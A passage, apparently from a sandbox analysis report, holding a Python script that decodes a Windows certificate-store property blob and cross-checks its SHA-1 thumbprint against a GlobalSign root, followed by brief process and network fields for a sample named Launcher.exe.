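    "1400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc"
    "620000000100000020000000"
    "cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b"
    "0b000000010000003000000047006c006f00620061006c005300690067006e002000"
    "52006f006f00740020004300410020002d002000520033000000"
)


def parse_blob(blob):
    """Return the ordered list of (prop_id, data) records; raise on truncation."""
    records, off = [], 0
    while off < len(blob):
        if off + 12 > len(blob):
            raise ValueError(f"truncated record header at offset {off}")
        prop_id, reserved, length = struct.unpack_from("<III", blob, off)
        off += 12
        if reserved != 1:
            raise ValueError(f"unexpected reserved field {reserved} at offset {off - 8}")
        data = blob[off:off + length]
        if len(data) != length:
            raise ValueError(f"record {prop_id} claims {length} bytes, only {len(data)} left")
        records.append((prop_id, data))
        off += length
    return records


def build_blob(records):
    """Inverse of parse_blob; used to construct test inputs."""
    return b"".join(struct.pack("<III", p, 1, len(d)) + d for p, d in records)


def summarize(blob, key_thumbprint):
    """Decode what an analyst checks first and cross-check the hashes."""
    records = parse_blob(blob)
    props = dict(records)
    name = props.get(11)
    cert = props.get(32)
    out = {
        "properties": [PROP_NAMES.get(p, f"prop_{p}") for p, _ in records],
        "friendly_name": name.decode("utf-16-le").rstrip("\x00") if name else None,
        "sha1": props[3].hex() if 3 in props else None,
        "sha256": props[98].hex() if 98 in props else None,
        "has_certificate": cert is not None,
        "sha1_matches_cert": None,
    }
    # The key name must equal the SHA-1 property, and both must equal the
    # hash of the DER in property 32 whenever that record is present.
    out["sha1_matches_key"] = out["sha1"] == key_thumbprint.lower()
    if cert is not None and out["sha1"] is not None:
        out["sha1_matches_cert"] = hashlib.sha1(cert).hexdigest() == out["sha1"]
    return out


def self_check():
    """Constructed blobs: one consistent, one whose SHA-1 property lies."""
    fake_der = b"constructed placeholder, not a real certificate"
    good = build_blob([(3, hashlib.sha1(fake_der).digest()), (32, fake_der)])
    bad = build_blob([(3, b"\x00" * 20), (32, fake_der)])
    return (summarize(good, hashlib.sha1(fake_der).hexdigest())["sha1_matches_cert"],
            summarize(bad, "00" * 20)["sha1_matches_cert"])


if __name__ == "__main__":
    for k, v in summarize(REPORT_BLOB_EXCERPT, KEY_THUMBPRINT).items():
        print(f"{k}: {v}")
    print("self_check:", self_check())
```

On the full blob from the report the same decoder also yields the EKU, root-program policy and certificate records; run it over the complete hex and compare `sha1_matches_cert` and the SHA-256 in property 98 with the GlobalSign root fingerprint you already trust before treating the signature as anything more than a TLS side effect.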

Processes

C:\Users\Admin\AppData\Local\Temp\Launcher.exe

"C:\Users\Admin\AppData\Local\Temp\Launcher.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A